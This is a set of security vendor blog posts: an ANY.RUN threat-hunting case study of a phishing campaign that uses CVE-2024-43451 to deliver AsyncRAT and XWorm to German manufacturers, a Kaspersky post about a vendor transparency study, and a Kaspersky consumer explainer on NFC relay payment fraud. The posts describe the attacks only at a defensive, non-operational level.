  • Files detected by only one or two vendors often indicate fresh attacks designed to bypass traditional defenses, making early discovery critical. 
  • The reuse of WebDAV, known vulnerabilities, and familiar RAT families across cases helps analysts distinguish structured campaigns from background noise. 
  • Filtering threats by sector and country dramatically improves relevance, allowing teams to focus on attacks that are most likely to impact their business. 
  • By identifying campaigns before alerts trigger, organizations can shorten dwell time and prevent disruptions that are especially costly for manufacturing operations. 
  • By correlating industry, geography, techniques, and indicators, Threat Intelligence Lookup helps manufacturing companies uncover active campaigns early and turn threat intelligence into a preventive control, not just a reference source. 

The Threat Landscape: Manufacturing Under Siege 

ANY.RUN‘s data, based on sandbox submissions of over 500K analysts and 15K SOCs, shows increased malicious activity against manufacturing companies. While this uptick aligns with patterns across other industries, manufacturing consistently shows slightly higher-than-average attack rates, confirming its status as a priority target. 

Attacks on manufacturing companies vs attacks on other sectors 

Top businesses operating in the industry rely on Threat Intelligence Lookup to track the latest attacks and campaigns conducted against manufacturing enterprises. 

Accessing an up-to-date threat landscape for your industry requires just one search query: 

industry:”Manufacturing” 

TI Lookup provides fresh threat intel for numerous industries 

The service instantly delivers actionable intelligence on the latest cyber threats targeting companies around the world.  

Learn more about threat landscape tracking with TI Lookup → 

This enables SOC teams to timely update their defenses before the attackers have a chance to strike. By acting proactively, organizations are able to protect their infrastructure, prevent downtime, and avoid incident response costs. 

Threat Hunting for a German Manufacturing Company 

NOTE: This case study demonstrates how malware analysts use proactive threat hunting with ANY.RUN’s Threat Intelligence Lookup to identify and analyze real-world attacks targeting manufacturing companies, specifically focusing on a sophisticated campaign against German industrial firms.  

(We have substituted the actual company’s name by a COMPANY_NAME placeholder.) 

Let’s assume we are conducting continuous threat hunting for a manufacturing company based in Germany. Our objective is simple but critical: identify phishing emails as potential initial access vectors before they reach production systems. 

Using ANY.RUN’s Threat Intelligence Lookup, we build a focused query: 

industry:”Manufacturing” AND filePath:”*.eml” AND not threatLevel:”info” AND submissionCountry:”DE” 

Searching for phishing emails targeting German industry 

With a 90-day analysis window, the search yielded over 30 real-world cases representing potential intrusion attempts against organizations similar to ours. 

Reduce operational risk with proactive visibility
Update defense with live attack data from 15K SOCs



Access TI Lookup Premium  


A Closer Look at One Real Attack 

One case stood out for its sophistication and targeted approach.  

A malware analysis session in ANY.RUN’s sandbox 

The attack leveraged the brand of a popular software provider in Germany, indicating specific targeting of German companies. What made this case particularly noteworthy was the combination of: 

  • Exploitation of a recently disclosed vulnerability, 
  • Simultaneous deployment of two Remote Access Trojans (RATs): AsyncRAT and XWorm
  • Highly convincing social engineering tactics. 

Enrich indicators with live attack data in TI Lookup
Speed up triage & response with critical context



Try TI Lookup 


The attack targeted a German construction and engineering services company through a carefully crafted phishing email: 
 
Sender Spoofing: 

  • Display name: “COMPANY_NAME eG” (legitimate company name), 
  • Actual sender: g.bader-gmbh@gmx[.]de (German domain for additional authenticity). 
Phishing mail: real company sender name, non-related local email address  

Email Content: 

  • Designed as an invoice notification from COMPANY_NAME
  • Included document number and date for legitimacy, 
  • Professional design increasing click-through probability, 
  • Malicious link embedded in the message. 
Phishing email text and malicious link 

Clicking the link redirected victims to Dropbox, where a file named “COMPANY_NAME -Rechnung Nr. 21412122025.pdf.zip” awaited download. 

Obfuscation Techniques: 

  • Double file extension (.pdf.zip) to disguise the true file type; 
  • Archive contained “COMPANY_NAME-Rechnung Nr. 21412122025.pdf.url”, a shortcut file masquerading as a PDF; 
  • Formatting designed to encourage victims to open the file 
Archive containing malicious shortcut disguised as .pdf 

Detection Evasion: 

At the time of analysis, this file was flagged as malicious by only one vendor on VirusTotal. That low detection rate strongly suggests a fresh sample designed to bypass traditional security controls. 

VirusTotal file analysis 

The attack leveraged CVE-2024-43451, a vulnerability that enables automatic WebDAV connections without actually opening the .url file. During archive processing or interaction with the attachment, the system automatically connects to a remote resource. 

Vulnerability exploit detected by ANY.RUN’s Sandbox 
Malicious file analysis in the Sandbox 

Execution Flow: 

  • Opening the .url file from the ZIP archive; 
  • Remote resource displays as a network directory; 
  • Contains .lnk file disguised as a PDF; 
  • Launching this file triggers subsequent attack stages; 
Malicious file in user’s network directory 

This combination provides attackers with redundancy and persistence, increasing the chances of maintaining access to the victim’s environment. 

Process Graph in the Sandbox shows trojan deployment 

Notably, similar WebDAV-based techniques exploiting this vulnerability have been observed in APT activity, confirming that this is not opportunistic noise but a well-established attack pattern. 

Expanding the Investigation: Campaign Scope Analysis 

Identifying one attack is only the beginning. The real value of proactive threat hunting lies in understanding scale, patterns, and relevance. 

Using Threat Intelligence Lookup, we pivot from the original case to search for related activity: emails and PDFs containing“COMPANY_NAME” in file names; hashes associated with the malicious documents. 

filePath:”COMPANY_NAME.pdf*” or filePath:”COMPANY_NAME.eml” or sha256:”8af19a103fbab4d5a2b9f59098e78e61df1721508e2d148fe9ba2b29e72900ca” 

Searching for similar malware samples via TI Lookup 

Query Results: 

  • 35 analyses matching the specified parameters; 
  • Almost all of them uploaded starting November 4, confirming recent activity; 
  • Multiple instances showing Dropbox connections for ZIP archive delivery; 
  • Generated indicators suitable for enriching detection systems. 

When we analyze the industry and geography breakdown, the picture becomes even clearer. Manufacturing remains one of the top targeted industries, with nearly two-thirds of executions occurring in Germany. The same core techniques appear repeatedly: CVE-2024-43451, WebDAV abuse, AsyncRAT, and XWorm. 

TI Lookup results Overview: targeted industries and locations; associated malware families 

Hash search of the PDF file employed in the attack shows 40% of submissions from manufacturing industry and 100% of uploads by ANY.RUN’s Sandbox users from Germany:  

SHA256:”8af19a103fbab4d5a2b9f59098e78e61df1721508e2d148fe9ba2b29e72900ca” 

TI Lookup search of a file hash 

Since AsyncRAT and XWorm are widely used, we narrow our focus to the vulnerability itself. A lookup for CVE-2024-43451 shows that most samples originate from the EU, with Germany accounting for roughly half of them. Manufacturing once again appears among the primary targeted industries. WebDAV connections are present in all samples, indicating standardized attack logic. 

threatName:”CVE-2024-43451″ 

Search by the vulnerability’s name returns sandbox analyses tagged WebDAV 

This level of repetition is exactly what threat hunters look for. It provides solid arguments to prioritize the threat, enrich internal detection systems with relevant indicators, and proactively hunt for similar behavior in logs, email gateways, and network traffic. 

Discovering Industry-Specific Patterns 

Threat Intelligence Lookup also allows us to search for malicious activity tied to industry-specific domain patterns. By querying domains containing fragments like “manufactur” and filtering for confirmed malicious activity, we uncover more than 100 sandbox analyses and dozens of suspicious domains. 
 
domainName:”manufactur*” and threatLevel:”malicious” 

Explore industry-specific threats and gather indicators in TI Lookup  

These findings help extend detection beyond known campaigns and uncover infrastructure that may be reused in future attacks against manufacturing organizations. 

Key Findings and Implications 

This case clearly shows that attacks using COMPANY_NAME-themed lures, WebDAV and CVE-2024-43451 abuse remain highly relevant for manufacturing companies, especially in Germany. More importantly, it demonstrates how proactive threat hunting changes the security posture entirely. 

Instead of reacting to alerts after compromise, malware analysts can: 

  • Identify active campaigns targeting their industry and region; 
  • Understand attacker techniques before they reach production; 
  • Prioritize threats based on real-world repetition and relevance; 
  • Feed high-confidence indicators into detection and prevention systems. 

With ANY.RUN’s Threat Intelligence Lookup, threat intelligence becomes a living, searchable environment rather than a static feed. For manufacturing companies facing constant operational pressure, this proactive approach can mean the difference between uninterrupted production and costly downtime. 

Stay Ahead of Attacks with ANY.RUN 

ANY.RUN helps security teams move earlier in the attack lifecycle by combining real-time malware analysis with actionable threat intelligence. 

With the Interactive Sandbox, analysts can safely execute suspicious files and instantly observe attacker behavior, techniques, and indicators to accelerate MTTD and MTTR. 

Threat Intelligence Feeds help your company catch new threats early 

Threat Intelligence Feeds expand threat coverage with verified malicious network IOCs from real-time attacks on 15K+ orgs. Delivered instantly from ANY.RUN’s sandbox in flexible STIX/TAXII for seamless SIEM/SOAR integration

TI Feeds empower SOC teams to ensure: 

  • Early Detection: IOCs added right after live sandbox analysis—proactively spot new threats in your SOC before they hit. 
  • Expanded Coverage: 99% unique indicators from global attacks (phishing, malware) that traditional feeds miss. 
  • Reduced Workload: Malicious-only alerts, filtered to slash Tier 1 time on false positives. 

For manufacturing facing targeted campaigns and high downtime costs, it provides visibility into real attacks as they unfold, allowing them to spot risks before production halts. 

Expand threat coverage and speed up MTTR
Integrate real-time intel from 15K SOCs



Try TI Feeds 


About ANY.RUN  

ANY.RUN supports more than 15,000 organizations worldwide, including leaders in finance, healthcare, telecom, retail, and tech, helping them strengthen security operations and respond to threats with greater confidence.   

Designed for speed and visibility, the solutions provide interactive malware analysis and live threat intelligence, giving SOC teams instant insight into attack behavior and the context needed to act faster.   

Request a trial or quote for your company → 

FAQ: Proactive Threat Hunting for Manufacturing 

1. Why are manufacturing companies frequently targeted by cybercriminals? 

Manufacturing organizations combine high operational impact, complex IT and OT environments, and tight downtime tolerance. This makes them attractive targets for ransomware groups and espionage-driven campaigns seeking fast leverage.  

2. What role does phishing play in attacks on manufacturing companies? 

Phishing remains one of the most common initial access vectors. Attackers often use localized and industry-specific lures, such as invoices or supplier documents, to increase credibility and user interaction. 

3. What is proactive threat hunting and how does it differ from traditional detection? 

Proactive threat hunting focuses on identifying active or emerging attack patterns before alerts are triggered. Instead of waiting for detections, analysts search threat intelligence data for techniques, indicators, and campaigns relevant to their industry and region. 

4. Why is industry- and region-specific threat intelligence important? 

Threats are rarely random. Campaigns are often tailored to specific countries, languages, and industries. Filtering threat intelligence by industry and geography helps analysts focus on the most realistic risks to their organization. 

5. What makes vulnerabilities like CVE-2024-43451 especially dangerous? 

Such vulnerabilities enable stealthy execution paths and are often abused before widespread detection signatures exist. Their repeated appearance across campaigns makes them strong indicators of active attacker playbooks. 

6. How can malware analysts use threat intelligence to prioritize threats? 

By identifying recurring techniques, delivery methods, and malware families across multiple cases, analysts can distinguish isolated noise from systematic campaigns and prioritize threats that are most likely to impact their environment. 

7. How does proactive threat hunting benefit manufacturing businesses? 

It reduces dwell time, lowers the chance of operational disruption, and enables earlier defensive action. For manufacturing, where downtime equals financial loss, early visibility can prevent incidents rather than merely respond to them. 

The post German Manufacturing Under Phishing Attacks: Tracking a Stealthy AsyncRAT Campaign  appeared first on ANY.RUN’s Cybersecurity Blog.

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How we set the standard for transparency and trust | Kaspersky official blog

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The life of a modern head of information security (also known as CISO – Chief Information Security Officer) is not just about fighting hackers. It’s also an endless quest that goes by the name of “compliance”. Regulators keep tightening the screws, standards pop up like mushrooms, and headaches only get worse; but wait… – there’s more: CISOs are responsible not only for their own perimeter, but what goes on outside it too: for their entire supply chain, all their contractors, and the whole hodge-podge of software their business processes run on. Though the logic here is solid, it’s also unfortunately ruthless: if a hole is found at your supplier, but the problems hit you, in the end it’s you who’s held accountable. This logic applies to security software too.

Back in the day, companies rarely thought about what was actually inside the security solutions and products they used. Now, however, businesses – especially large ones – want to know everything: what’s really inside the box? Who wrote the code? Is it going to break some critical function or could it even bring everything down? (We’ve seen such precedents; example: the Crowdstrike 2024 update incident.) Where and how is data processed? And these are the right questions to ask.

The problem lies in the fact that almost all customers trust their vendors to answer accurately when asked such questions – very often because they have no other choice. A more mature approach in today’s cyber-reality is to verify.

In corporate-speak this is called supply-chain trust, and trying to solve this puzzle on your own is a serious headache. You need help from vendors. A responsible vendor is ready to show what’s under the hood of its solutions, to open up the source code to partners and customers for review, and, in general, to earn trust not with nice slides but with solid, practical steps.

So who’s already doing this, and who’s still stuck in the past? A fresh, in-depth study from our colleagues in Europe has the answer. It was conducted by the respected testing lab AV-Comparatives, the Austrian Economic Chamber (WKO), the MCI Entrepreneurial School, and the law firm Studio Legale Tremolada.

The main conclusion of the study is that the era of “black boxes” in cybersecurity is over. RIP. Amen. The future belongs to those who don’t hide their source code and vulnerability reports, and who give customers maximum choice when configuring their products. And the report clearly states who doesn’t just promise but actually delivers. Guess who!…

What a great guess! Yes – it’s us!

We give our customers something that is still, unfortunately, a rare and endangered species in the industry: transparency centers, source code reviews of our products, a detailed software bill of materials (SBOM), and the ability to check update history and control rollouts. And of course we provide everything that’s already become the industry standard. You can study all the details in the full “Transparency and Accountability in Cybersecurity” (TRACS) report, or in our summary. Below, I’ll walk through some of the most interesting bits.

Not mixing apples and oranges

TRACS reviewed 14 popular vendors and their EPP/EDR products – from Bitdefender and CrowdStrike to our EDR Optimum and WithSecure. The objective was to understand which vendors don’t just say “trust us”, but actually let you verify their claims. The study covered more than 60 criteria: from GDPR (General Data Protection Regulation – it’s a European study after all) compliance and ISO 27001 audits, to the ability to process all telemetry locally and access a product’s source code. But the authors decided not to give points for each category or form a single overall ranking.

Why? Because everyone has different threat models and risks. What is a feature for one may be a bug and a disaster for another. Take fast, fully automatic installation of updates. For a small business or a retail company with thousands of tiny independent branches, this is a blessing: they’d never have enough IT staff to manage all of that manually. But for a factory where a computer controls the conveyor it would be totally unacceptable. A defective update can bring a production line to a standstill, which in terms of business impact could be fatal (or at least worse than the recent Jaguar Land Rover cyberattack); here, every update needs to be tested first. It’s the same story with telemetry. A PR agency sends data from its computers to the vendor’s cloud to participate in detecting cyberthreats and get protection instantly. Perfect. A company that processes patients’ medical records or highly classified technical designs on its computers? Its telemetry settings would need to be reconsidered.

Ideally, each company should assign “weights” to every criterion, and calculate its own “compatibility rating” with EDR/EPP vendors. But one thing is obvious: whoever gives customers choices, wins.

Take file reputation analysis of suspicious files. It can work in two ways: through the vendor’s common cloud, or through a private micro-cloud within a single organization. Plus there’s the option to disable this analysis altogether and work completely offline. Very few vendors give customers all three options. For example, “local” reputation analysis is available from only eight vendors in the test. It goes without saying we’re one of them.

Raising the bar

In every category of the test the situation is roughly the same as with the reputation service. Going carefully through all 45 pages of the report, we’re either ahead of our competitors or among the leaders. And we can proudly say that in roughly a third of the comparative categories we offer significantly better capabilities than most of our peers. See for yourself:

Visiting a transparency center and reviewing the source code? Verifying that the product binaries are built from this source code? Only three vendors in the test provide these things. And for one of them – it’s only for government customers. Our transparency centers are the most numerous and geographically spread out, and offer customers the widest range of options.

The opening of our first transparency center back in 2018

The opening of our first transparency center back in 2018

Downloading database updates and rechecking them? Only six players – including us – provide this.

Configuring multi-stage rollout of updates? This isn’t exactly rare, but it’s not widespread either – only seven vendors besides us support it.

Reading the results of an external security audit of the company? Only we and six other vendors are ready to share this with customers.

Breaking down a supply chain into separate links using an SBOM? This is rare too: you can request an SBOM from only three vendors. One of them is the green-colored company that happens to bear my name.

Of course, there are categories where everyone does well: all of them have successfully passed an ISO/IEC 27001 audit, comply with GDPR, follow secure development practices, and accept vulnerability reports.

Finally, there’s the matter of technical indicators. All products that work online send certain technical data about protected computers, and information about infected files. For many businesses this isn’t a problem, and they’re glad it improves effectiveness of protection. But for those seriously focused on minimizing data flows, AV-Comparatives measures those too – and we just so happen to collect the least amounts of telemetry compared to other vendors.

Practical conclusions

Thanks to the Austrian experts, CISOs and their teams now have a much simpler task ahead when checking their security vendors. And not just the 14 that were tested. The same framework can be applied to other security solution vendors and to software in general. But there are strategic conclusions too…

Transparency makes risk management easier. If you’re responsible for keeping a business running, you don’t want to guess whether your protection tool will become your weak point. You need predictability and accountability. The WKO and AV-Comparatives study confirms that our model reduces these risks and makes them manageable.

Evidence instead of slogans. In this business, it’s not enough to be able write “we are secure” on your website. You need audit mechanisms. The customer has to be able to drop by and verify things for themselves. We provide that. Others are still catching up.

Transparency and maturity go hand in hand. Vendors that are transparent for their customers usually also have more mature processes for product development, incident response, and vulnerability handling. Their products and services are more reliable.

Our approach to transparency (GTI) works. When we announced our initiative several years ago and opened Transparency Centers around the world, we heard all kinds of things from critics – like that it was a waste of money and that nobody needed it. Now independent European experts are saying that this is how a vendor should operate in 2025 and beyond.

It was a real pleasure reading this report. Not just because it praises us, but because the industry is finally turning in the right direction – toward transparency and accountability.

We started this trend, we’re leading it, and we’re going to keep pioneering within it. So, dear readers and users, don’t forget: trust is one thing; being able to fully verify is another.

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Your personal information is on the dark web. What happens next?

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If your data is on the dark web, it’s probably only a matter of time before it’s abused for fraud or account hijacking. Here’s what to do.

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Direct and reverse NFC relay attacks being used to steal money | Kaspersky official blog

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Thanks to the convenience of NFC and smartphone payments, many people no longer carry wallets or remember their bank card PINs. All their cards reside in a payment app, and using that is quicker than fumbling for a physical card. Mobile payments are also secure — the technology was developed relatively recently and includes numerous anti-fraud protections. Still, criminals have invented several ways to abuse NFC and steal your money. Fortunately, protecting your funds is straightforward: just know about these tricks and avoid risky NFC usage scenarios.

What are NFC relay and NFCGate?

NFC relay is a technique where data wirelessly transmitted between a source (like a bank card) and a receiver (like a payment terminal) is intercepted by one intermediate device, and relayed in real time to another. Imagine you have two smartphones connected via the internet, each with a relay app installed. If you tap a physical bank card against the first smartphone and hold the second smartphone near a terminal or ATM, the relay app on the first smartphone will read the card’s signal using the NFS and relay it in real time to the second smartphone, which will then transmit this signal to the terminal. From the terminal’s perspective, it all looks like a real card is tapped on it — even though the card itself might physically be in another city or country.

This technology wasn’t originally created for crime. The NFCGate app appeared in 2015 as a research tool after it was developed by students at the Technical University of Darmstadt in Germany. It was intended for analyzing and debugging NFC traffic, as well as for education purposes and experiments with contactless technology. NFCGate was distributed as an open-source solution and used in academic and enthusiast circles.

Five years later, cybercriminals caught on to the potential of NFC relay and began modifying NFCGate by adding mods that allowed it to run through a malicious server, disguise itself as legitimate software, and perform social engineering scenarios.

What began as a research project morphed into the foundation for an entire class of attacks aimed at draining bank accounts without physical access to bank cards.

A history of misuse

The first documented attacks using a modified NFCGate occurred in late 2023 in the Czech Republic. By early 2025, the problem had become large scale  and noticeable: cybersecurity analysts uncovered more than 80 unique malware samples built on the NFCGate framework. The attacks evolved rapidly, with NFC relay capabilities being integrated into other malware components.

By February 2025, malware bundles combining CraxsRAT and NFCGate emerged, allowing attackers to install and configure the relay with minimal victim interaction. A new scheme, a so-called “reverse” version of NFCGate, appeared in spring 2025, fundamentally changing the attack’s execution.

Particularly noteworthy is the RatOn Trojan, first detected in the Czech Republic. It combines remote smartphone control with NFC relay capabilities, letting attackers target victims’ banking apps and cards through various technique combinations. Features like screen capture, clipboard data manipulation, SMS sending, and stealing info from crypto wallets and banking apps give criminals an extensive arsenal.

Cybercriminals have also packaged NFC relay technology into malware-as-a-service (MaaS) offerings, and reselling them to other threat actors through subscription. In early 2025, analysts uncovered a new and sophisticated Android malware campaign in Italy, dubbed SuperCard X. Attempts to deploy SuperCard X were recorded in Russia in May 2025, and in Brazil in August of the same year.

The direct NFCGate attack

The direct attack is the original criminal scheme exploiting NFCGate. In this scenario, the victim’s smartphone plays the role of the reader, while the attacker’s phone acts as the card emulator.

First, the fraudsters trick the user into installing a malicious app disguised as a banking service, a system update, an “account security” app, or even a popular app like TikTok. Once installed, the app gains access to both NFC and the internet — often without requesting dangerous permissions or root access. Some versions also ask for access to Android accessibility features.

Then, under the guise of identity verification, the victim is prompted to tap their bank card to their phone. When they do, the malware reads the card data via NFC and immediately sends it to the criminals’ server. From there, the information is relayed to a second smartphone held by a money mule, who helps extract the money. This phone then emulates the victim’s card to make payments at a terminal or withdraw cash from an ATM.

The fake app on the victim’s smartphone also asks for the card PIN — just like at a payment terminal or ATM — and sends it to the attackers.

In early versions of the attack, criminals would simply stand ready at an ATM with a phone to use the duped user’s card in real time. Later, the malware was refined so the stolen data could be used for in-store purchases in a delayed, offline mode, rather than in a live relay.

For the victim, the theft is hard to notice: the card never left their possession, they didn’t have to manually enter or recite its details, and the bank alerts about the withdrawals can be delayed or even intercepted by the malicious app itself.

Among the red flags that should make you suspect a direct NFC attack are:

  • prompts to install apps not from official stores;
  • requests to tap your bank card on your phone.

The reverse NFCGate attack

The reverse attack is a newer, more sophisticated scheme. The victim’s smartphone no longer reads their card — it emulates the attacker’s card. To the victim, everything appears completely safe: there’s no need to recite card details, share codes, or tap a card to the phone.

Just like with the direct scheme, it all starts with social engineering. The user gets a call or message convincing them to install an app for “contactless payments”, “card security”, or even “using central bank digital currency”. Once installed, the new app asks to be set as the default contactless payment method — and this step is critically important. Thanks to this, the malware requires no root access — just user consent.

The malicious app then silently connects to the attackers’ server in the background, and the NFC data from a card belonging to one of the criminals is transmitted to the victim’s device. This step is completely invisible to the victim.

Next, the victim is directed to an ATM. Under the pretext of “transferring money to a secure account” or “sending money to themselves”, they are instructed to tap their phone on the ATM’s NFC reader. At this moment, the ATM is actually interacting with the attacker’s card. The PIN is dictated to the victim beforehand — presented as “new” or “temporary”.

The result is that all the money deposited or transferred by the victim ends up in the criminals’ account.

The hallmarks of this attack are:

  • requests to change your default NFC payment method;
  • a “new” PIN;
  • any scenario where you’re told to go to an ATM and perform actions there under someone else’s instructions.

How to protect yourself from NFC relay attacks

NFC relay attacks rely not so much on technical vulnerabilities as on user trust. Defending against them comes down to some simple precautions.

  • Make sure you keep your trusted contactless payment method (like Google Pay or Samsung Pay) as the default.
  • Never tap your bank card on your phone at someone else’s request, or because an app tells you to. Legitimate apps might use your camera to scan a card number, but they’ll never ask you to use the NFC reader for your own card.
  • Never follow instructions from strangers at an ATM — no matter who they claim to be.
  • Avoid installing apps from unofficial sources. This includes links sent via messaging apps, social media, SMS, or recommended during a phone call — even if they come from someone claiming to be customer support or the police.
  • Use comprehensive security on your Android smartphones to block scam calls, prevent visits to phishing sites, and stop malware installation.
  • Stick to official app stores only. When downloading from a store, check the app’s reviews, number of downloads, publication date, and rating.
  • When using an ATM, rely on your physical card instead of your smartphone for the transaction.
  • Make it a habit to regularly check the “Payment default” setting in your phone’s NFC menu. If you see any suspicious apps listed, remove them immediately and run a full security scan on your device.
  • Review the list of apps with accessibility permissions — this is a feature commonly abused by malware. Either revoke these permissions for any suspicious apps, or uninstall the apps completely.
  • Save the official customer service numbers for your banks in your phone’s contacts. At the slightest hint of foul play, call your bank’s hotline directly without delay.
  • If you suspect your card details may have been compromised, block the card immediately.

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